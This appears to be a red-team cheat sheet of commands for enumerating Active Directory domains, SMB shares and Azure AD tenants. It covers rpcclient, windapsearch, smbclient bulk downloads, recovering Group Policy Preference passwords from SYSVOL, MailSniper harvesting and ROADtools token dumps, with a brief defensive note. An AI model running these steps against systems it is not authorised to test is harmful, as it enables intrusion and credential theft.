Domain Recon

Tips

# Enumerate sessions
net session \\computer


Domain Properties

rpcclient

# You can use rpc to enumerate domain objects
rpcclient -U <user> <IP-DC>

rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> querygroupmem 0x200
rpcclient $> srvinfo
rpcclient $> querygroup 0x42
rpcclient $> queryuser 0x42
rpcclient $> getdompwinfo
rpcclient $> getusrdompwinfo 0x42


enum4linux

# You can use enum4linux to enumerate domain users
# You can try anonymous binding
sudo enum4linux domaine.fr
./enum4linux.pl -R 1090-1200


windapsearch

# windapsearch is also a very good tool to perform automated LDAP queries
# Enumerate users
./windapsearch.py -d lab.ropnop.com -u ropnop\\ldapbind -p GoCubs16 -U
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -U

# enumerate all entries in objectCategory=group
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -G

# Query group membership
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -m <CN/OU>

# Enumerate all domain admins and people having equivalent rights
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 --da

# Enumerate all computers
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -C

# Custom search
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -s <stringToSearch>


Pywerview

python pywerview.py get-netuser -w GALACTIC.LAN -u d.traya --dc-ip 192.168.56.103 --username d.traya 
python pywerview.py get-netgroup -w GALACTIC.LAN -u d.traya --dc-ip 192.168.56.103 --username d.vador


SMB & Share

Basic enumeration

# Enumerate hostname
nmblookup -A <victim_ip>
enum4linux -n <victim_ip>
$ nmap --script=smb-enum* --script-args=unsafe=1 -T5 <victim_ip>

# Check for null sessions
smbmap -H <victim_ip>

# Checking for vulns
nmap --script smb-vuln* -p139,445 -T4 -Pn <victim_ip>

Smbclient

# Using smbclient
smbclient -L <IP>
smbclient -U GALACTIC.LAN\\d.vador -L //10.69.88.10

# You can recursively download a folder
smb: > recurse ON
smb: > prompt OFF
smb: > mget *

SYSVOL & MS14-025

# You can browse SMB share using smbclient
# The SYSVOL share contains GPO, you can look for a MS14-025
smbclient -U user //10.34.67.4/SYSVOL
# MS14-025
→ smb: \NORZH.LAN\Policies\{195471B6-B0C6-4AD2-9853-28E2B4E9CEF6}\Machine\Preferences\Groups\Groups.xml
→ gpp-decrypt password

CrackMapExec & Impacket

# Impacket SMB/MSRPC tools
# lookupsids → SID Bruteforce through MSRPC Interface
# samrdump → SAM Remote Interface (MSRPC) to extract system users, available share etc.
# services → Used to (start, stop, delete, status, config, list, create, change) services through MSRPC interface
# netview → Get a list of opened sessions and keep tracks of who logged in/off from remote targets
# smbclient → generic SMB client
# rpcdump → This script will dump the list of RPC endpoints and string bindings registered at the target.
# reg → Remote registry manipulation tool through the [MS-RRP] MSRPC Interface.
tool.py domain\user:password@IP <command/parameter>

# You can list all shares on a shares on a machine to find potential entry points
cme smb 10.69.88.23 -u user -p password --shares

Defensive

# DEFENSIVE POINT OF VIEW
# You can list active SMB sessions
C:\> net session
# And kill them
C:\> net session \[LinuxIPaddr] /del


Azure AD Recon

# Applications using Azure API Management
# Requests made to that
<name>.azure-api.net

# Documentation and more
<name>.portal.azure-api.net

# Gateway
<name>.azure-api.net

# Dev
<name>.portal.azure-api.net
<name>.developer.azure-api.net

# Management
<name>.management.azure-api.net

# Git
<name>.scm.azure-api.net
https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html

# Tool o365recon can be used (https://github.com/nyxgeek/o365recon)
# It mainly uses MS Online Powershell module

PS> Connect-MsolService
PS> powershell -ep bypass .\o365recon.ps1 -outputfile TEST_OUTPUT

# The -users_detailed flag can be used in order to query more information about users
# LastDirSyncTime empty == User only exist in the cloud

# The id suffixed to the SYNC cloud account == same id for the MSOL account belonging to the on-premises Active Directory

# You can also list Azure AD roles and members (cf attached link)

# MailSniper can also be used to get the Adress List
PS C:\> Get-GlobalAddressList -ExchHostname outlook.office365.com -UserName xxxx -Password xxxx -OutFile xxxx

# And associated usernames
PS C:\> Get-ADUsernameFromEWS -EmailList list.txt -ExchHostname outlook.office365.com -Remote
# When having admin privileges you can check for MFA for users
PS C:\> Connect-MsolService
PS C:\> Get-MsolUser -EnabledFilter EnabledOnly -MaxResults 50000 | select DisplayName,UserPrincipalName,@{N="MFA Status"; E={ if( $_.StrongAuthenticationRequirements.State -ne $null){ $_. StrongAuthenticationRequirements.State} else { "Disabled"}}} | export-csv mfaresults.csv
# ROADTools (https://github.com/dirkjanm/ROADtools)*
# It uses an internal undocumented version of Microsoft Graph API

PS C:\> roadrecon.exe auth -u user@domain
Tokens were written to .roadtools_auth

PS C:\> roadrecon.exe dump

PS C:\> roadrecon-gui.exe -debug -d .\roadrecon.db
 * Serving Flask app "roadtools.roadrecon.server" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: off
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)

# Plugin for getting Conditional Access Policies
PS C:\> roadrecon plugin policies